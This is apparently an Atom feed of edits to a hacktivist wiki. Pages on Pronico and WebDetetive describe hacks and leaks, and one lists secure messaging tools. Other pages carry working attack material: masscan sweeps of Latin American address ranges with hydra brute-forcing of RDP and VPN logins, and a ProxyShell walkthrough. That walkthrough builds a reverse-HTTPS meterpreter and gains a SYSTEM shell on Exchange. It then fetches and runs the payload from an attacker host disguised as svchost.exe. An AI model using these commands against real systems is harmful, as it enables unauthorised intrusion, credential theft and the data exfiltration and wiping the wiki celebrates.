&#039;&#039;&#039;2.&#039;&#039;&#039; Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE] &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap -p 443 -Pn -n \&lt;br /&gt;
&amp;gt; --script http-vuln-exchange-proxyshell.nse -iL owa.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]&lt;br /&gt;
&lt;br /&gt;
===== Domains =====&lt;br /&gt;
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.&lt;br /&gt;
&lt;br /&gt;
See [[Domain Spray and Pray]] scanning.&lt;br /&gt;
&lt;br /&gt;
==== Password Attacks ====&lt;br /&gt;
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.&lt;br /&gt;
&lt;br /&gt;
===== RDP =====&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== VPN =====&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Virtual Private Network (VPN) Brute forcing:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;gt;&amp;lt;/code&amp;gt;&lt;br /&gt;
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=To_Do&amp;diff=1711</id>
		<title>To Do</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=To_Do&amp;diff=1711"/>
		<updated>2023-11-27T08:20:08Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: updated&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;These pages need special attention and work.&lt;br /&gt;
&lt;br /&gt;
= Empty Articles =&lt;br /&gt;
&lt;br /&gt;
These pages have no content at all.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;[[Special:WantedPages|Red links]]&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* [[AnibalLeaks]]‏‎&lt;br /&gt;
* [[Bob Otto emails]]‏&lt;br /&gt;
* [[LeakyMails]]‏‏‎&lt;br /&gt;
* [[Salvini emails]]‏&lt;br /&gt;
* [[Sarah Palin emails‏]]&lt;br /&gt;
* [[Syria emails]]‏‎‎&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Uncreated pages&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* DCCC Hack&lt;br /&gt;
* DNC Email hacks&lt;br /&gt;
* Guccifer&lt;br /&gt;
* OPM Hack&lt;br /&gt;
* [[Sabu]]&lt;br /&gt;
* SolarWinds&lt;br /&gt;
* The Shadow Brokers&lt;br /&gt;
* [[Albert Gonzalez]]&lt;br /&gt;
* [[Max Butler]]&lt;br /&gt;
&lt;br /&gt;
= Stubs =&lt;br /&gt;
These pages have minimal content, but need to be expanded.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;[[Category:Stub_pages|Stub pages]]&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
== Hacks ==&lt;br /&gt;
&lt;br /&gt;
* [[Berat Albayrak Emails]]&lt;br /&gt;
* [[Bureau Of Justice]]&lt;br /&gt;
* [[Cayman National Bank and Trust (Isle of Man)]]&lt;br /&gt;
* [[Chinga la Migra]]&lt;br /&gt;
* [[CorruptBrazil]]&lt;br /&gt;
* [[CSLEA]]&lt;br /&gt;
* [[Epik]]&lt;br /&gt;
* [[Flexispy]]&lt;br /&gt;
* [[Fuck FBI Friday]]&lt;br /&gt;
* [[Gamma Group]]&lt;br /&gt;
* [[Hacking Team]]&lt;br /&gt;
* [[HBGary]]&lt;br /&gt;
* [[Luanda Leaks]]&lt;br /&gt;
* [[LulzSecPeru]]&lt;br /&gt;
* [[Milico Leaks]]&lt;br /&gt;
* [[Norton AntiVirus]]&lt;br /&gt;
* [[Operation Payback]]&lt;br /&gt;
* [[Policía Nacional Civil de El Salvador]]&lt;br /&gt;
* [[Project AIG]]&lt;br /&gt;
* [[Russian Interior Ministry]]&lt;br /&gt;
* [[Shooting Sheriffs Saturday]]&lt;br /&gt;
* [[Sownage]]&lt;br /&gt;
* [[Stratfor]]&lt;br /&gt;
* [[Surkov Leaks]]&lt;br /&gt;
* [[Varela Leaks‏]]&lt;br /&gt;
&lt;br /&gt;
== Hackers ==&lt;br /&gt;
&lt;br /&gt;
* [[AntiSec]]&lt;br /&gt;
* [[CyberHunta]]&lt;br /&gt;
* [[FocaLeaks]]&lt;br /&gt;
* [[Jeremy Hammond]]&lt;br /&gt;
* [[Legion Of Doom]]&lt;br /&gt;
* [[Maksym Igor Popov]]&lt;br /&gt;
* [[Rui Pinto]]&lt;br /&gt;
* [[Tillie Kottmann]]&lt;br /&gt;
* [[Ukrainian Cyber Troops]]&lt;br /&gt;
* [[Walter Delgatti]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Orphans =&lt;br /&gt;
These pages and files have been created, but aren&#039;t linked to.&lt;br /&gt;
&lt;br /&gt;
== Pages ==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;[[Special:LonelyPages|Orphaned pages]]&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* [[Jeremy Hammond]]&lt;br /&gt;
* [[Legion Of Doom]]&lt;br /&gt;
* [[Maksym Igor Popov]]&lt;br /&gt;
* [[Masters of Deception]]&lt;br /&gt;
* [[Walter Delgatti]]&lt;br /&gt;
&lt;br /&gt;
== Files ==&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Pronico&amp;diff=1710</id>
		<title>Pronico</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Pronico&amp;diff=1710"/>
		<updated>2023-11-27T08:17:25Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Pronico operates the Fenix mine in Guatemala, which has a long history of human rights abuses, environmental damage, and resistance by the surrounding communities.&lt;br /&gt;
&lt;br /&gt;
== Media Coverage ==&lt;br /&gt;
English:&lt;br /&gt;
* https://ddosecrets.com/wiki/Mining_Secrets&lt;br /&gt;
* https://forbiddenstories.org/case/mining-secrets/&lt;br /&gt;
* https://www.theguardian.com/global-development/2022/mar/06/indigenous-groups-oppose-restarting-guatemala-nickel-mine&lt;br /&gt;
* https://www.occrp.org/en/investigations/mining-secrets-major-nickel-producer-accused-of-polluting-guatemalas-largest-lake#&lt;br /&gt;
&lt;br /&gt;
Spanish:&lt;br /&gt;
* https://www.prensacomunitaria.org/2022/03/diez-claves-para-leer-la-investigacion-miningsecrets/&lt;br /&gt;
* https://forbiddenstories.org/es/case/mining-secrets/&lt;br /&gt;
* https://elpais.com/internacional/2022-03-06/asi-se-compra-un-estado-como-una-minera-rusa-corrompio-a-todos-los-poderes-en-guatemala.html&lt;br /&gt;
* https://www.prensacomunitaria.org/2022/03/solway-la-minera-senalada-de-espionaje-a-periodistas-rechaza-acusaciones/&lt;br /&gt;
* https://www.prensacomunitaria.org/2022/03/secreto-minero-una-investigacion-sobre-las-estrategias-de-una-mina-rusa-en-guatemala6/&lt;br /&gt;
* https://elfaro.net/es/202203/centroamerica/26055/Filtraci%C3%B3n-de-documentos-confirma-cooptaci%C3%B3n-del-Estado-guatemalteco-por-empresa-minera.htm&lt;br /&gt;
* https://storeproject.squarespace.com/secretos-mineros/espionaje-y-criminalizacion&lt;br /&gt;
* https://desinformemonos.org/la-version-caribena-de-una-red-criminal-entre-rusos-suizos-y-chapines-en-guatemala/&lt;br /&gt;
* https://desinformemonos.org/%d0%b3%d0%b2%d0%b0%d1%82%d0%b5%d0%bc%d0%b0%d0%bb%d0%b0-los-senores-del-polvo-rojo-y-los-senores-del-polvo-blanco/&lt;br /&gt;
* https://desinformemonos.org/%d0%b3%d0%b2%d0%b0%d1%82%d0%b5%d0%bc%d0%b0%d0%bb%d0%b0-guatemala-se-escribe-en-ruso/&lt;br /&gt;
&lt;br /&gt;
== Hack ==&lt;br /&gt;
The hack was done by a group calling themselves [[Guacamaya]]&lt;br /&gt;
* [https://enlacehacktivista.org/comunicado_guacamaya.txt Statement by the hackers]&lt;br /&gt;
* [https://forbiddenstories.org/the-struggle-of-one-territory-must-be-the-struggle-of-all/ Interview]&lt;br /&gt;
* [[Media:Pronico.png|Screenshot]] of a statement posted to Pronico&#039;s website by the hackers&lt;br /&gt;
&lt;br /&gt;
=== Video ===&lt;br /&gt;
The hackers published a video showing in detail how they hacked Pronico, downloaded files and emails to leak, and then repeatedly sabotaged the company&#039;s computers over the course of 6 months. It can be downloaded [https://enlacehacktivista.org/hackback.webm here] or watched [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T here.] Credits for the video&#039;s soundtrack is available [https://enlacehacktivista.org/guacamaya_soundtrack.txt here]&lt;br /&gt;
&lt;br /&gt;
==== Video Timeline ====&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&lt;br /&gt;
0:51    Introduction&lt;br /&gt;
2:05    ProxyLogon&lt;br /&gt;
5:35    Other methods of initial access&lt;br /&gt;
7:15    Get Domain Admin via dumping LSA secrets&lt;br /&gt;
13:35   Lateral movement onto other servers&lt;br /&gt;
15:40   Backdooring a switch&lt;br /&gt;
21:42   Golden Tickets&lt;br /&gt;
25:08   Eternal Blue&lt;br /&gt;
32:56   Enabling wdigest and dumping passwords with mimikatz&lt;br /&gt;
33:53   Grabbing VPN and saved browser passwords of sysadmin&lt;br /&gt;
40:26   Scanning for SMB shares&lt;br /&gt;
42:45   Exfiltrating files&lt;br /&gt;
49:09   Enabling file sharing via group policy&lt;br /&gt;
54:35   Exfiltrating e-mail&lt;br /&gt;
1:03:22 Wiping company&#039;s storage servers&lt;br /&gt;
1:11:31 Wiping computers with Kaspersky&lt;br /&gt;
1:13:07 Wiping servers using diskpart&lt;br /&gt;
1:14:46 Wiping Office 365&lt;br /&gt;
1:24:16 Wiping windows domain with Bitlocker&lt;br /&gt;
1:40:28 Stealthy persistence and avoiding AV with dnscat2&lt;br /&gt;
1:45:28 Avoiding AV with mimikatz&lt;br /&gt;
1:47:03 Wiping storage servers via iscsi&lt;br /&gt;
2:06:18 Avoiding AV to exploit PrintNightmare&lt;br /&gt;
2:13:35 Wiping windows domain with sdelete&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:Hacks]]&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=WebDetetive&amp;diff=1709</id>
		<title>WebDetetive</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=WebDetetive&amp;diff=1709"/>
		<updated>2023-11-27T08:15:30Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: fix&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;150,000 files from the spyware reseller WebDetetive, a phone monitoring app typically installed on phones without the user&#039;s consent (or even knowledge). The software uploads the contents of the user&#039;s phone to its servers, messages, call logs, phone call recordings, photos, ambient recordings from the phone’s microphone and GPS data.&lt;br /&gt;
&lt;br /&gt;
The data does not include files from the victims devices. WebDetetive does not verify customer e-mail addresses when signing up.&lt;br /&gt;
&lt;br /&gt;
== Media Coverage ==&lt;br /&gt;
# https://ddosecrets.com/wiki/WebDetetive&lt;br /&gt;
# https://techcrunch.com/2023/08/26/brazil-webdetetive-spyware-deleted/&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Proxyshell&amp;diff=1708</id>
		<title>Proxyshell</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Proxyshell&amp;diff=1708"/>
		<updated>2023-11-27T08:14:13Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Exploiting proxyshell - CVE-2021-34473 ==&lt;br /&gt;
* (Book) Mastering Metasploit: Exploit systems, cover your tracks, and bypass security controls with the Metasploit 5.0 framework, 4th Edition&lt;br /&gt;
I found that using &amp;lt;code&amp;gt;exploit/windows/http/exchange_proxyshell_rce&amp;lt;/code&amp;gt; doesn&#039;t work but [https://github.com/Udyz/proxyshell-auto proxyshell-auto] does for gaining RCE. Here we use both the exploit and a meterpreter to compromise vulnerable hosts.&lt;br /&gt;
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md Metasploit - Cheatsheet]&lt;br /&gt;
&lt;br /&gt;
=== Build meterpreter ===&lt;br /&gt;
First we make an implant to perform post exploitation using metasploit:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;msfvenom -p windows/meterpreter/reverse_https LHOST=1.2.3.4 LPORT=8888 -e x86/shikata_ga_nai -i 5 -f exe -o meterpreter.exe&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now we set our listener:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
use exploit/multi/handler&lt;br /&gt;
set PAYLOAD windows/meterpreter/reverse_https&lt;br /&gt;
set LHOST 1.2.3.4&lt;br /&gt;
set LPORT 8888&lt;br /&gt;
run&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Host meterpreter for download:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;python3 -m http.server&lt;br /&gt;
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Gain a shell ===&lt;br /&gt;
We first use [https://github.com/Udyz/proxyshell-auto proxyshell-auto exploit] which will give us a shell if the exchange server has powershell enabled.&lt;br /&gt;
&lt;br /&gt;
Gain a shell:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
user@host:~$ python3 proxyshell-auto/proxyshell.py -t 10.10.10.11&lt;br /&gt;
fqdn srvexchange2016.domain.local&lt;br /&gt;
+ Administrator@domain.com&lt;br /&gt;
legacyDN /o=COMPANY/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=cc84dab2b5f8407ea1545e2f024382aa-Administrator&lt;br /&gt;
leak_sid S-1-5-21-654894352-2732664023-2722231124-500&lt;br /&gt;
token VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBxBZG1pbmlzdHJhdGV1ckBwZWNoZXhwb3J0Lm1nVSxTLTEtNS0yMS02NTQ4OTQzNTItMjczMjY2NDAyMy0yNzIyMjMxMTI0LTUwMEcBAAAABwAAAAxTLTEtNS0zMi01NDRFAAAAAA==&lt;br /&gt;
set_ews Success with subject grvshwaveotkomvc&lt;br /&gt;
write webshell at aspnet_client/yhuzv.asPx&lt;br /&gt;
&amp;lt;Response [404]&amp;gt;&lt;br /&gt;
nt authority\system&lt;br /&gt;
SHELL&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From here we want to [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md download a meterpreter payload] for post exploitation:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;SHELL&amp;gt; powershell.exe Invoke-WebRequest -Uri &amp;quot;http://1.2.3.4:8000/meterpreter.exe&amp;quot; -OutFile &amp;quot;c:\Windows\Temp\svchost.exe&amp;quot;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
We now set our listener and execute the payload:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;SHELL&amp;gt; powershell.exe &amp;quot;c:\windows\Temp\svchost.exe&amp;quot;&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
From here we will have a meterpreter connection to work from :)&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[*] Started HTTPS reverse handler on https://1.2.3.4:8888&lt;br /&gt;
[*] https://1.2.3.4:8888 handling request from 10.10.10.11; (UUID: qdghnakk) Staging x86 payload (176732 bytes) ...&lt;br /&gt;
[*] Meterpreter session 1 opened (1.2.3.4:8888 -&amp;gt; 10.10.10.11:1984) at 2023-07-05 08:00:18 +0000&lt;br /&gt;
meterpreter &amp;gt; sysinfo&lt;br /&gt;
Computer        : srvexchange2016&lt;br /&gt;
OS              : Windows 2016+ (10.0 Build 14393).&lt;br /&gt;
Architecture    : x64&lt;br /&gt;
System Language : en_US&lt;br /&gt;
Domain          : DOMAIN&lt;br /&gt;
Logged On Users : 6&lt;br /&gt;
Meterpreter     : x86/windows&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== E-mail exfiltration ===&lt;br /&gt;
For exfiltrating e-mails via [https://github.com/Jumbo-WJB/Exchange_SSRF proxyshell exploitation] see [https://enlacehacktivista.org/hackback2.webm Guacamaya&#039;s tutorial HackBack video].&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Secure_Messaging_Applications&amp;diff=1707</id>
		<title>Secure Messaging Applications</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Secure_Messaging_Applications&amp;diff=1707"/>
		<updated>2023-11-27T08:12:48Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: mini improviment&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Recommended Applications ==&lt;br /&gt;
&lt;br /&gt;
* [https://element.io/ Element/Matrix] A secure communications platform built around you.&lt;br /&gt;
* [https://xmpp.org/ XMPP] The universal messaging standard.&lt;br /&gt;
* [https://onionshare.org Onionshare] Privacy + Productivity.&lt;br /&gt;
* [https://tox.chat/ Tox] A New Kind of Instant Messaging.&lt;br /&gt;
* [https://briarproject.org/ Briar] Secure messaging, anywhere.&lt;br /&gt;
* [https://signal.org/ Signal] Speak Freely.&lt;br /&gt;
* [https://cwtch.im Cwtch] Surveillance resistant infrastructure. ([http://cwtchim3z2gdsyb27acfc26lup5aqbegjrjsqulzrnkuoalq5h4gmcid.onion Tor])&lt;br /&gt;
* [https://getsession.org/ Session Messenger] Send messages, not metadata.&lt;br /&gt;
* [https://www.thunderbird.net Thunderbird] A e-mail client with built-in support for [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq PGP encryption].&lt;br /&gt;
* Probably the most mature XMPP client with a focus on security and privacy is [https://coy.im/ CoyIM] | [https://github.com/coyim/coyim GitHub] ([http://qvt3o2ipzxx3gtoyafd3ptqwsxjs52enlwlxuryn2xjkm7hnp5icd6yd.onion Tor])&lt;br /&gt;
&lt;br /&gt;
== Operating Systems ==&lt;br /&gt;
* [https://www.qubes-os.org/ Qubes OS] A reasonably secure operating system.&lt;br /&gt;
* [https://www.whonix.org/ Whonix] Superior Internet Privacy.&lt;br /&gt;
* [https://tails.net Tails] a portable operating system that protects against surveillance and censorship.&lt;br /&gt;
&lt;br /&gt;
== E-mail Services ==&lt;br /&gt;
* [https://disroot.org/en Disroot] Disroot is a platform providing online services based on principles of freedom, privacy, federation and decentralization.&lt;br /&gt;
* [https://riseup.net/en/email Riseup] E-mail invite only.&lt;br /&gt;
* [https://proton.me/mail Protonmail] Secure E-mail that protects your privacy.&lt;br /&gt;
* [https://tuta.com/ Tuta] Secure, green and ad-free. E-mail to feel good about.&lt;br /&gt;
&lt;br /&gt;
== Guides ==&lt;br /&gt;
* [https://anonymousplanet.org/ The Hitchhiker’s Guide to Online Anonymity] | [http://thgtoa27ujspeqxasrfvcf5aozqdczvgmwgorrmblh6jn4nino3spcqd.onion/ Tor].&lt;br /&gt;
* [https://www.anarsec.guide/ Anarsec] Tech Guides for Anarchists.&lt;br /&gt;
* [https://www.eff.org/pages/surveillance-self-defense Surveillance Self-Defense].&lt;br /&gt;
* [https://privacy.awiki.org/ The Privacy Raccoon] Digital self-defense against mass surveillance.&lt;br /&gt;
* [https://www.whonix.org/wiki/Tips_on_Remaining_Anonymous Tips on Remaining Anonymous] Whonix Wiki.&lt;br /&gt;
&lt;br /&gt;
* [https://s0cm0nkey.gitbook.io/s0cm0nkeys-security-reference-guide/grey-privacy-tor-opsec s0cm0nkey&#039;s Security Reference Guide].&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=AntiSec&amp;diff=1706</id>
		<title>AntiSec</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=AntiSec&amp;diff=1706"/>
		<updated>2023-11-27T08:05:00Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: mini improviment&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;AntiSec was an offshoot of Anonymous with the self-declared goal of stealing and leaking any classified government information, including e-mail spools and documentation. Their prime targets were banks and other high-ranking establishments.&lt;br /&gt;
&lt;br /&gt;
AntiSec was eventually taken down by law enforcement, largely due to the informant Sabu.&lt;br /&gt;
&lt;br /&gt;
Communiques via defacements:&lt;br /&gt;
* https://www.zone-h.org/mirror/id/14841451&lt;br /&gt;
* https://www.zone-h.org/mirror/id/16969108&lt;br /&gt;
* https://www.zone-h.org/mirror/id/17107967&lt;br /&gt;
* https://www.zone-h.org/mirror/id/16859089&lt;br /&gt;
* https://www.zone-h.org/mirror/id/16859533&lt;br /&gt;
* https://www.zone-h.org/mirror/id/16983974&lt;br /&gt;
* https://www.zone-h.org/mirror/id/16983975&lt;br /&gt;
* https://www.zone-h.org/mirror/id/16824726&lt;br /&gt;
&lt;br /&gt;
== Files ==&lt;br /&gt;
[[File:Operation_Anti-Security.txt]]&lt;br /&gt;
&lt;br /&gt;
[[Category:Hackers]]&lt;br /&gt;
[[Category:Stub pages]]&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=MagaCoin&amp;diff=1705</id>
		<title>MagaCoin</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=MagaCoin&amp;diff=1705"/>
		<updated>2023-11-27T08:03:24Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Hack of a website associated with MagaCoin, exposing the e-mail addresses, passwords, wallet addresses and IP addresses of early investors in the &amp;quot;mineable cryptocoin created with Conservatives in mind.&amp;quot;&lt;br /&gt;
&lt;br /&gt;
[https://www.theguardian.com/technology/2021/jul/22/magacoin-pro-trump-cryptocurrency-attracts-over-1000-people-to-sign-up Revealed: the people who signed up to the Magacoin Trump cryptocurrency] (The Guardian)&lt;br /&gt;
&lt;br /&gt;
[[Category:Hacks]]&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Search_Engines_Resources&amp;diff=1704</id>
		<title>Search Engines Resources</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Search_Engines_Resources&amp;diff=1704"/>
		<updated>2023-11-27T08:02:48Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Search Engines ==&lt;br /&gt;
The following search engines can be used as part of your passive recon. They are good for searching through code repositories, passive port scanning and technology analysis and looking for CVEs and exploits. To make use of their fullest potential they often require payments. Remember to conduct good OPSEC when placing any purchases with services that you&#039;re going to use in your hacktivist operations!&lt;br /&gt;
&lt;br /&gt;
Many of these search engines allow the use of an API. You can integrate their API&#039;s with some of your automated tooling.&lt;br /&gt;
&lt;br /&gt;
=== Web ===&lt;br /&gt;
* https://www.google.com&lt;br /&gt;
* https://duckduckgo.com&lt;br /&gt;
* https://www.bing.com&lt;br /&gt;
* https://yandex.com&lt;br /&gt;
* https://metager.de/&lt;br /&gt;
* https://searxng.nicfab.eu/&lt;br /&gt;
* https://search.carrot2.org/#/search/web&lt;br /&gt;
* https://github.com&lt;br /&gt;
** https://github.com/gwen001/github-subdomains&lt;br /&gt;
*** https://github.com/gwen001/github-endpoints&lt;br /&gt;
**** https://github.com/gwen001/github-regexp&lt;br /&gt;
&lt;br /&gt;
=== Code repository search ===&lt;br /&gt;
* https://grep.app&lt;br /&gt;
* https://searchcode.com&lt;br /&gt;
&lt;br /&gt;
=== Exploit/CVE search ===&lt;br /&gt;
* https://www.exploit-db.com&lt;br /&gt;
* https://www.rapid7.com/db&lt;br /&gt;
* https://sploitus.com&lt;br /&gt;
* https://www.exploitalert.com/search-results.html&lt;br /&gt;
* https://vulmon.com&lt;br /&gt;
* https://www.cisa.gov/known-exploited-vulnerabilities-catalog&lt;br /&gt;
* https://vulners.com [Free &amp;amp; Paid]&lt;br /&gt;
* Nuclei template search engine: https://nuclei-templates.netlify.app&lt;br /&gt;
&lt;br /&gt;
=== Internet of things search ===&lt;br /&gt;
* https://www.shodan.io [Free &amp;amp; Paid]&lt;br /&gt;
* https://www.zoomeye.org [Free &amp;amp; Paid]&lt;br /&gt;
* https://search.censys.io [Free &amp;amp; Paid]&lt;br /&gt;
* https://dnsdumpster.com&lt;br /&gt;
* https://urlscan.io [Free &amp;amp; Paid]&lt;br /&gt;
* https://ivre.rocks&lt;br /&gt;
* https://fullhunt.io [Free &amp;amp; Paid]&lt;br /&gt;
* https://pulsedive.com [Free &amp;amp; Paid]&lt;br /&gt;
* https://wigle.net&lt;br /&gt;
* https://crt.sh&lt;br /&gt;
* https://publicwww.com [Free &amp;amp; Paid]&lt;br /&gt;
* https://viz.greynoise.io [Free &amp;amp; Paid]&lt;br /&gt;
* https://tls.bufferover.run [Free &amp;amp; Paid]&lt;br /&gt;
* https://www.whois.com/whois&lt;br /&gt;
* Passively enumerate subdomains: https://subdomainfinder.c99.nl&lt;br /&gt;
* https://host.io [Free &amp;amp; Paid]&lt;br /&gt;
* https://viewdns.info&lt;br /&gt;
* https://hackertarget.com [Free &amp;amp; Paid]&lt;br /&gt;
* Internet analysis: https://bgp.he.net&lt;br /&gt;
* https://check-host.net&lt;br /&gt;
* https://whois.whoisxmlapi.com [Free &amp;amp; Paid]&lt;br /&gt;
* https://www.whoxy.com [Free &amp;amp; Paid]&lt;br /&gt;
* https://viewdns.info&lt;br /&gt;
&lt;br /&gt;
=== Business e-mail search ===&lt;br /&gt;
* https://hunter.io [Paid]&lt;br /&gt;
* https://rocketreach.co [Paid]&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=User:Mxwgn&amp;diff=1703</id>
		<title>User:Mxwgn</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=User:Mxwgn&amp;diff=1703"/>
		<updated>2023-11-27T07:59:10Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt; Hello.&lt;br /&gt;
&lt;br /&gt;
 e-mail: maxwell@disroot.org&lt;br /&gt;
 fediverse: nixnet.social/maxwl&lt;/div&gt;</summary>
		<author><name>Mxwgn</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=WebDetetive&amp;diff=1701</id>
		<title>WebDetetive</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=WebDetetive&amp;diff=1701"/>
		<updated>2023-11-16T23:06:16Z</updated>

		<summary type="html">&lt;p&gt;Mxwgn: &lt;/p&gt;
&lt;hr /&gt;
